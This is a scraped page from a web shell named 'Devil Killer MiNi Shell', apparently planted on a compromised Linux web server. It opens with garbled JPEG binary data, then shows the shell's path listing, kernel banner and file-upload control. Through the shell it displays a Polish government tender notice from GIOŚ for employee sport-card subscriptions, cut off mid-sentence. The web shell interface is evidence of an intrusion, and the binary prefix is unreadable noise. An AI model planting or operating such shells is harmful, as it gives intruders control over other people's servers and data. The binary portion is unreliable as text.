JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250604/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250604/0026238101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zakup usługi kart sportowych dla pracowników Głównego Inspektoratu Ochrony Środowiska w ramach miesięcznego abonamentu na 24 miesiące </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Inspektorat Ochrony Środowiska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000861593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bitwy Warszawskiej 1920 roku nr 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-362</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">p.winnicki@gios.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gov.pl/gios</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup usługi kart sportowych dla pracowników Głównego Inspektoratu Ochrony Środowiska w ramach miesięcznego abonamentu na 24 miesiące </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-563fd79a-2361-4900-9e15-1b2f338e6559</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00262381</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00158566/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Zakup karnetów na zajęcia rekreacyjno-sportowe dla pracowników GIOŚ</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-gios.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformy<br/>zakupowej<br/>zamawiającego pod adresem: https://zamowienia-gios.ezamawiajacy.pl.<br/>2. Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie z Rozporządzeniem<br/>Prezesa Rady Ministrów z dnia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452)<br/>Zgodnie z Rozdziałem XIII SWZ (Techniczne ograniczenia w ogłoszeniu)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3. Dokumentacja niniejszego<br/>postępowania została opublikowana na platformie zakupowej.<br/>W celu zapoznania się z dokumentacją postępowania Wykonawca po przejściu na<br/>dedykowany adres platformy zakupowej:<br/>- do upływu terminu składania ofert przechodzi do zakładki „Lista ogłoszonych<br/>postępowań”, wybiera zakładkę „Aktualne” i wyszukuje przedmiotowe postępowanie,<br/>- po upływie terminu składania ofert przechodzi do zakładki „Lista ogłoszonych<br/>postępowań”, wybiera zakładkę „Archiwalne” i wyszukuje przedmiotowe postępowanie.<br/>4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego<br/>tj. bezpłatnie rejestrując się lub, w przypadku posiadania konta w platformie zakupowej,<br/>logując się, akceptuje regulamin zamieszczony na stronie internetowej:<br/>https://oneplace.marketplanet.pl/regulamin oraz warunki korzystania z platformy zakupowej<br/>wynikające z Instrukcji korzystania z platformy zakupowej Wykonawcy (Instrukcja<br/>użytkownika). Instrukcja dostępna jest pod adresem:<br/>https://zamowieniagios.<br/>ezamawiajacy.pl/servlet/HomeServlet?MP_module=main&amp;MP_action=publicFilesList&amp;cl<br/>ientName=gios&amp;USER_MENU_HOVER=publicFilesList<br/>W celu wejścia na platformę zakupową umożliwiającą m.in. zapoznanie się z treścią SWZ,<br/>złożenie oferty, wymagane jest uprzednie zalogowanie. Wykonawcy, którzy nie założyli konta,<br/>zobligowani są do uprzedniej, bezpłatnej rejestracji. Szczegóły rejestracji wskazane są w<br/>Instrukcji korzystania z platformy zakupowej. Proces rejestracji trwa maksymalnie do 2 dni<br/>roboczych. Zamawiający zaleca więc Wykonawcom uwzględnienie czasu niezbędnego na<br/>rejestrację w procesie złożenia oferty w postaci elektronicznej.<br/>Ważne – oferta zapisana na platformie zakupowej nie oznacza, że została ona złożona.<br/>Zapisanie oferty daje użytkownikowi czas, na wprowadzenie ewentualnych poprawek,<br/>uzupełnień, dołączenie dodatkowych załączników. Dopiero wybór ikony ZŁÓŻ<br/>OFERTĘ/WNIOSEK oznacza złożenie oferty/wniosku zgodnie z przepisami ustawy Pzp.<br/>5. W prowadzonym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz<br/>informacje Zamawiający i Wykonawcy przekazują za pomocą platformy zakupowej pod<br/>adresem: https://zamowienia-gios.ezamawiajacy.pl.<br/>6. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ za pośrednictwem<br/>platformy zakupowej. Treść zapytań wraz z wyjaśnieniami treści SWZ będzie zamieszczana na stronie internetowej Zamawiającego<br/>za pośrednictwem platformy zakupowej pod adresem:<br/>https://zamowienia-gios.ezamawiajacy.pl.<br/>7. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego,<br/>uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego<br/>przed upływem tego terminu (wczytanie na platformie zakupowej).<br/>8. Za datę wpływu oferty, oświadczeń wniosków, zawiadomień oraz informacji przekazywanych<br/>przez Wykonawcę i Zamawiającego przyjmuje się datę i godzinę wczytania na platformie<br/>zakupowej.<br/>9. Jeśli w niniejszej Specyfikacji Warunków Zamówienia jest mowa o opatrzeniu / podpisaniu<br/>dokumentu / oświadczenia kwalifikowanym podpisem elektronicznym, Zamawiający wymaga,<br/>aby kwalifikowany podpis elektroniczny wystawiony był przez dostawcę kwalifikowanej usługi<br/>zaufania, będącego podmiotem świadczącym usługi certyfikowane – podpis elektroniczny,<br/>spełniające wymogi bezpieczeństwa określone w ustawie z dnia 5 września 2016 r. o usługach<br/>zaufania oraz identyfikacji elektronicznej (Dz. U. z 2024 r. poz. 442). Szczegółowe informacje<br/>o sposobie pozyskania usługi kwalifikowanego podpisu elektronicznego oraz warunkach jej<br/>użycia można znaleźć na stronach internetowych kwalifikowanych dostawców usług zaufania, których lista znajduje się pod adresem internetowym http://www.nccert.pl.<br/>10. Zamawiający dopuszcza w szczególności następujące formaty danych, dokumentów<br/>i oświadczeń: doc, docx, pdf, xml.1, podpisane kwalifikowalnym podpisem elektronicznym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">I. Klauzula informacyjna dotycząca przetwarzania danych osobowych przez Główny<br/>Inspektorat Ochrony Środowiska w celu wyboru najkorzystniejszej oferty<br/>Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z<br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych- RODO), (Dz. U. UE.<br/>L. z 2016 r. Nr 119, str. 1 z późn. zm.), podajemy następujące informacje:<br/>1. Administratorem Pani/Pana danych osobowych jest Główny Inspektor Ochrony Środowiska z<br/>siedzibą w Warszawie, z którym może się Pani/Pan kontaktować<br/>w następujący sposób:<br/>􀀀 listownie na adres siedziby administratora: 02-362 Warszawa, ul. Bitwy Warszawskiej 1920<br/>r. 3;<br/>􀀀 Elektroniczna Skrzynka Podawcza ePUAP: /gios/SkrytkaESP<br/>􀀀 telefonicznie na nr 22 577 53 80;<br/>􀀀 e-mail: gios@gios.gov.pl<br/>􀀀 adres do doręczeń elektronicznych AE:PL-67072-24050-IURUS-21.<br/>2. Główny Inspektor Ochrony Środowiska wyznaczył Inspektora Ochrony Danych do kontaktu w<br/>sprawach dotyczących przetwarzania danych osobowych oraz realizacji praw związanych z<br/>przetwarzaniem danych, z którym można kontaktować się:<br/>􀀀 listownie na adres siedziby administratora: 02-362 Warszawa, ul. Bitwy Warszawskiej 1920<br/>r. 3;<br/>􀀀 telefonicznie na nr 22 577 53 75;<br/>􀀀 e-mail: iod@gios.gov.pl<br/>3. Podstawą prawną przetwarzania Pani/Pana danych osobowych w szczególności jest:<br/>􀀀 art. 6 ust. 1 lit. b) RODO t j. przetwarzanie jest niezbędne w celu zawarcia i realizacji umowy<br/>oraz art. 6 ust. 1 lit. c) RODO tj. przetwarzanie jest niezbędne do wypełnienia obowiązku<br/>prawnego ciążącego na administratorze,<br/>􀀀 ustawa z dnia 10 maja 2018 r. o ochronie danych osobowych (t.j. Dz. U. z 2019 r. poz.<br/>1781),<br/>􀀀 ustawa z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz. U.<br/>z 2024 r. poz. 1320), zwana dalej „ustawą Prawo zamówień publicznych”,<br/>􀀀 ustawa z dnia 27 sierpnia 2009 r. o finansach publicznych (t.j. Dz. U. z 2024 r. poz. 1530),<br/>􀀀 ustawa z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120,<br/>z późn. zm.),<br/>􀀀 ustawa z dnia 23 kwietnia 1964 r. - Kodeks cywilny (Dz. U. z 2024 r. poz. 1061,<br/>z późn. zm.).<br/>4. Pani/Pana dane osobowe będą przetwarzane w celu wyboru najkorzystniejszej oferty<br/>w postępowaniu prowadzonym na podstawie przepisów ustawy Prawo zamówień<br/>publicznych.<br/>5. Odbiorcą Pani/Pana danych osobowych mogą być podmioty upoważnione do przetwarzania<br/>danych osobowych na podstawie przepisów prawa powszechnie obowiązującego, w tym<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu<br/>o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych. Dodatkowo informacje związane<br/>z postępowaniem są zamieszczane na platformie Marketplanet. W uzasadnionych<br/>przypadkach dane osobowe zostaną przekazane podmiotom, z którymi administrator zawarł<br/>umowę powierzenia przetwarzania danych osobowych w szczególności podmiotom<br/>świadczącym usługi w zakresie systemów informatycznych/ oprogramowania.<br/>6. Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do wykonania<br/>Umowy, celów przetwarzania danych osobowych, dochodzenia roszczeń, obrony przez<br/>roszczeniami oraz wykonania zadań wynikających z ustaw szczególnych, w tym ustawy z dnia<br/>14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164, z<br/>późn. zm.). 7. Przysługuje Pani/Panu prawo do żądania od administratora: dostępu do danych osobowych,<br/>sprostowania oraz ograniczenia przetwarzania, jeśli nie będą zachodziły przeciwskazania<br/>prawne.<br/>8. W przypadku gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy<br/>RODO ma Pani/Pan prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych ul. Stawki 2, 00-193 Warszawa tel. 22 531 03 00 e-mail: kancelaria@uodo.gov.pl.<br/>Zgodnie z rozdziałem XXVI SWZ - techniczne ograniczenia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">II. RODO (ograniczenia stosowania):<br/>Zamawiający informuje, że:<br/>a) udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów<br/>zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu<br/>terminu na ich wniesienie;<br/>b) udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o<br/>których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne,<br/>przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych<br/>genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osobyfizycznej lub danych dotyczących zdrowia,<br/>seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia;<br/>c) w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym<br/>mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od administratora potwierdzenia, czy<br/>przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich<br/>zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii danych osobowych podlegających<br/>przetwarzaniu),<br/>Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>d) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w art. 16 RODO (uprawnienie do<br/>sprostowania lub uzupełnienia danych osobowych),<br/>nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>e) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO,<br/>nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania;<br/>f) w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie<br/>przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia<br/>postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą<br/>przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAG-WZP.26.1.23.2025.PW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Przedmiotem zamówienia jest świadczenie usług na rzecz pracowników Głównego Inspektoratu Ochrony Środowiska, ich dzieci oraz osób towarzyszących, polegających na zapewnieniu dostępu do obiektów i usług sportowo-rekreacyjnych ramach miesięcznego abonamentu.<br/>Szczegółowy Opis przedmiotu zamówienia i sposobu jego realizacji zawiera Załącznik nr 2 do SWZ – „Opis przedmiotu zamówienia”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">92610000-0 - Usługi świadczone przez ośrodki sportowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	Punkty przyznane za kryterium „Cena oferty brutto” liczone będą wg następującego wzoru:<br/>C = (Cb : Cn) × 90<br/>C<br/>gdzie:<br/>C - liczba punktów, jakie uzyskała dana oferta w kryterium cena,<br/>CN - najniższa cena spośród ofert niepodlegających odrzuceniu,<br/>CB - cena oferty badanej.<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 90 pkt.<br/>W skład ceny oferty brutto będą wchodzić następujące elementy składowe:<br/>UWAGA! <br/>Cena oferty brutto to suma brutto wszystkich wariantów za okres 24 miesięcy. Każdy wariant składa się z 3 pozycji zgodnie z formularzem asortymentowo-cenowym.<br/>b)	Punkty przyznane za kryterium „Liczba obiektów” liczone będą wg następującego wzoru:<br/><br/>Zamawiający przyzna Wykonawcy 10 pkt. jeśli zaproponuje dla wszystkich abonamentów, w każdym wariancie liczbę obiektów sportowo-rekreacyjnych na terenie Polski wynoszącą 4500 albo więcej.<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 10 pkt.<br/>UWAGA! Kryterium dotyczy całej usługi, w tym wszystkich elementów składowych w usłudze. <br/>Wykonawca podaje tylko jedną wartość. Podana wartość obejmuje wszystkie warianty i wszystkie abonamenty w danym wariancie. <br/>Maksymalna możliwa liczba punktów do zdobycia jako suma wszystkich kryteriów wynosi 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba Obiektów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek nr 1:<br/>Wykonawca spełni warunek, jeżeli wykaże, że wykonał lub wykonuje w okresie ostatnich 3 (trzech) lat przed upływem składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie usługę:<br/>•	1 usługę w okresie 3 lat dla co najmniej 1 jednostki administracji publicznej w zakresie świadczenia dla jej pracowników, dzieci i osób towarzyszących abonamentu sportowo-rekreacyjnego. Okres trwania wykonanej/wykonywanej usługi musi wynosić minimum 12 miesięcy. Jednocześnie Zamawiający wymaga, aby przedmiotem usługi był/jest dostęp do co najmniej 200 obiektów sportowo-rekreacyjnych na terenie Warszawy i do co najmniej 3500 obiektów sportowo-rekreacyjnych na terenie Polski w ramach abonamentu dla pracowników, dzieci, osób towarzyszących.<br/><br/>Uwaga:<br/>− Dla potrzeb oceny spełniania warunku nr 1 określonego w Rozdziale VI ust. 2 pkt 4) jeśli wartość zamówienia (umowy) jest określona w innej walucie niż w złotych polskich, Zamawiający dokona przeliczenia tej wartości na złote polskie - na podstawie średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów Narodowego Banku Polskiego na dzień opublikowania Ogłoszenia o zamówieniu w Dzienniku Urzędowym 